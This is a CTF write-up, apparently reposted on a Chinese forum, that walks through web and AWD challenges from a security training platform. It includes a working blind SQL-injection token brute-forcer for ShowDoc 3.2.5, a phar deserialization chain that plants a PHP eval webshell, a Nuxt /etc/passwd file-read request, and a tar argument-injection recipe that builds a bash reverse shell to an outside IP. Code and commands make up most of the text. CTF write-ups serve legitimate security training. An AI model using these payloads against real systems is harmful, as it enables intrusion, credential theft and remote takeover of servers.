掌控安全CTF - 8月（WEB&AWD方向）

数据人与超自然意识 · 2024-10-11 07:38:09

好久没更新了，水一篇。
0x01 Web

1. web-php

标题代码如下：

<?php
show_source(__FILE__);
file($_POST['a']);
?>

复制代码

老演员了，涉及PHP filter文件读取攻击，参考：PHP Filter链——基于oracle的文件读取攻击，提示 flag 在 /flag 上，脚本一把梭。

2. web2

showdoc，跟着某些文章复现即可，我这个地方从暴破 token 到 phar 反序列化完整地走了一篇，就当复习知识点了。暴破 token 脚本如下：

import argparse
import ddddocr
import requests
import onnxruntime
from urllib.parse import urljoin
onnxruntime.set_default_logger_severity(3)
table = '0123456789abcdef'
proxies = {'http': 'http://127.0.0.1:8085'}
headers = {'Authorization': 'Basic emthcTp6a2Fx'}
ocr = ddddocr.DdddOcr()
ocr.set_ranges(table)
class RetryException(Exception):
pass
def retry_when_failed(func):
def retry_func(*args, **kwargs):
while True:
try:
return func(*args, **kwargs)
except RetryException:
continue
except Exception as e:
raise e
return retry_func
def generate_captcha(base: str):
data = requests.get(f"{base}?s=/api/common/createCaptcha", headers=headers).json()
captcha_id = data['data']['captcha_id']
response = requests.get(f'{base}?s=/api/common/showCaptcha&captcha_id={captcha_id}', headers=headers)
data = response.content
result = ocr.classification(data)
return captcha_id, result
@retry_when_failed
def exploit_one(base: str, current: str, ch: str) -> str:
captcha_id, captcha_text = generate_captcha(base)
data = requests.get(base, params={
's': '/api/item/pwd',
'page_id': '0',
'password': '1',
'captcha_id': captcha_id,
'captcha': captcha_text,
'item_id': f"aa') UNION SELECT 1,1,1,1,1,(SELECT 1 FROM user_token WHERE uid = 1 AND token LIKE '{current}{ch}%' LIMIT 1),1,1,1,1,1,1 FROM user_token; -- "
}, headers=headers).json()
if data['error_code'] == 0:
return ch
elif data['error_code'] == 10010:
return ''
elif data['error_code'] == 10206:
raise RetryException()
else:
print(f'error: {data!r}')
raise Exception('unknown exception')
def main():
parser = argparse.ArgumentParser(description='Showdoc 3.2.5 SQL injection')
parser.add_argument('-u', '--url', type=str, required=True)
args = parser.parse_args()
target = urljoin(args.url, '/server/index.php')
res = ''
for i in range(64):
r = ''
for ch in list(table):
r = exploit_one(target, res, ch)
if r:
res += ch
break
print(f'Current result: {res}')
if not r:
break
if __name__ == '__main__':
main()

复制代码

运行结果如下：

然后共同 user_token 打前台反序列化，phar poc如下：

<?php
namespace GuzzleHttp\Cookie{
class SetCookie
{
private $data = [];
public function __construct()
{
$this->data = array("Discard"=>false,"poc"=>'<?php eval($_REQUEST[0]);?>');
}
}
class CookieJar
{
/** @var SetCookie[] Loaded cookie data */
private $cookies = [];
public function __construct()
{
$this->cookies = [new SetCookie()];
}
}
class FileCookieJar extends CookieJar
{
/** @var string filename */
private $filename;
/** @var bool Control whether to persist session cookies or not. */
private $storeSessionCookies;
public function __construct($cookieFile, $storeSessionCookies = false)
{
parent::__construct();
$this->filename = $cookieFile;
$this->storeSessionCookies = $storeSessionCookies;
}
}
}
namespace {
$exampleWithClosure = new GuzzleHttp\Cookie\FileCookieJar("/var/www/html/Public/Uploads/shell.php",true);
$phar=new phar('image.phar',0);
$phar->startBuffering();
$phar->setMetadata($exampleWithClosure);
$phar -> setStub('GIF89a<?php __HALT_COMPILER();?>');
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
}

复制代码

运行上述php脚本后，就已经拿到了token以及phar文件。然后修改该phar文件后缀为jpg，同时构造本地文件上传表单，上传phar文件到对应的网站。

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Form Upload</title>
</head>
<body>
<form action="http://dyvfgrqa.lab.aqlab.cn/server/index.php?s=/api/page/upload" method="post" enctype="multipart/form-data">
<input type="hidden" name="user_token" value="5d302c5281dc08432a2e8d0ce47d832b074dc5f9f461720078cbfb26b667e463">
<label for="file">Choose file to upload:</label>
<input type="file" name="file" id="file"><br><br>
<input type="submit" value="Upload">
</form>
</body>
</html>

复制代码

上传后会返回 sign，如图：

访问对应的路径获取phar文件路径，如图：

访问phar文件路径，webshell被天生。

验证webshell有效性。

获取flag，如图：

3. Just A Index

aiohttp/3.9.1中存在路径遍历毛病，只需要找准一个基础路径，利用../遍历即可。参考：CVE-2024-23334 aiohttp路径遍历毛病，可以看到页面种加载了一张图片，路径是：/img/what.jpeg，可以基于/img举行路径遍历，如图：

0x02 AWD

1. Nothing

给了一个附件，从附件中可以分析出前端使用了 nuxt 框架，存在文件读取毛病，PoC如下：

GET /_nuxt/@fs/etc/passwd HTTP/1.1
Host: example.com

复制代码

获取flag，如图：

2. Scan

调用 nuclei 对目的网站举行扫描，给了附件，部分代码如下：

import flask
import subprocess
import re
app = Flask(__name__)
... ...
@app.route('/submit', methods=['POST'])
def submit():
... ...
if url is None:
return "No URL！ ", 400
if not url_pattern.match(url):
return "URL格式错误！", 400
if url:
command = ['./nuclei', '--silent', '-u', url, '-t', '0day-templates.yaml']
try:
result = subprocess.run(command, capture_output=True, text=True)
print(result.stdout)
if 'info' in result.stdout and '/api/v2/echo' in result.stdout and 'custom-templates' in result.stdout:
return flag
else:
return "非常安全，没有问题！"
except subprocess.CalledProcessError:
return "Error occurred while running command"
return "Invalid request"
if __name__ == '__main__':
... ...

复制代码

0day-templates.yaml文件内容如下：

这个地方直接用自己 vps伪造一个符合扫描规则的页面即可，代码如下：

from fastapi import FastAPI, Request
app = FastAPI()
@app.get('/api/v1/version/')
def api_version():
response = {
"version": "10.0.3",
"NAME": "HACKER",
"msg": "success"
}
return response
@app.get('/api/v2/echo/')
async def api_echo(request: Request):
return "zkaq{a} <script>alert(1111)</script>"
if __name__ == '__main__':
import uvicorn
uvicorn.run(app, host="0.0.0.0", port=8081)

复制代码

扫描结果如下：

3. 压缩打包站

上传文件后，后端会存储用户的文件并将其打包并提供压缩包下载功能。给了附件，部分代码如下：

from flask import Flask, g, render_template, request, redirect, make_response, send_file, after_this_request
import uuid, os
app = Flask(__name__)
@app.before_request
def check_uuid():
uuid_cookie = request.cookies.get('uuid', None)
if uuid_cookie is None:
response = make_response(redirect('/'))
response.set_cookie('uuid', str(uuid.uuid4()))
return response
try:
uuid.UUID(uuid_cookie)
except ValueError:
response = make_response(redirect('/'))
response.set_cookie('uuid', str(uuid.uuid4()))
return response
g.uuid = uuid_cookie
if not os.path.exists(f'uploads/{g.uuid}'):
os.mkdir(f'uploads/{g.uuid}')
@app.route('/', methods=['GET'])
def main():
return render_template('index.html', files=os.listdir(f'uploads/{g.uuid}'))
@app.route('/api/upload', methods=['POST'])
def upload():
file = request.files.get('file', None)
if file is None:
return 'No file provided', 400
# check for path traversal
if '..' in file.filename or '/' in file.filename:
return 'Invalid file name', 400
# check file size
if len(file.read()) > 1000:
return 'File too large', 400
file.save(f'uploads/{g.uuid}/{file.filename}')
return 'Success! <script>setTimeout(function() {window.location="/"}, 3000)</script>', 200
@app.route('/api/download', methods=['GET'])
def download():
@after_this_request
def remove_file(response):
os.system(f"rm -rf uploads/{g.uuid}/out.tar")
return response
# make a tar of all files
os.system(f"cd uploads/{g.uuid}/ && tar -cf out.tar *")
# send tar to user
return send_file(f"uploads/{g.uuid}/out.tar", as_attachment=True, download_name='download.tar', mimetype='application/octet-stream')
if __name__ == "__main__":
app.run(host='0.0.0.0', port=2024, threaded=True)

复制代码

毛病触发点，关键在于：

os.system(f"cd uploads/{g.uuid}/ && tar -cf out.tar *")

复制代码

此处涉及tar参数注入操作，具体原理参考：tar参数注入，构造文件命令如下：

echo 'bash -c "bash -i >& /dev/tcp/1.1.1.1/10086 0>&1"' | base64
echo "" > "--checkpoint-action=exec=echo [base64_reverseshell_payload] | base64 -d | bash" # 生成第一个文件
echo "" > --checkpoint=1 # 生成第二个文件
echo "" > test.txt # 生成第三个文件

复制代码

将三个文件分别上传，然后点击页面中的 download 下载压缩包。

vps吃到反弹shell，获取flag。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

		自动登录	找回密码
密码			立即注册

掌控安全CTF - 8月（WEB&AWD方向）

本帖子中包含更多资源

0 个回复

快速回复

楼主热帖

标签云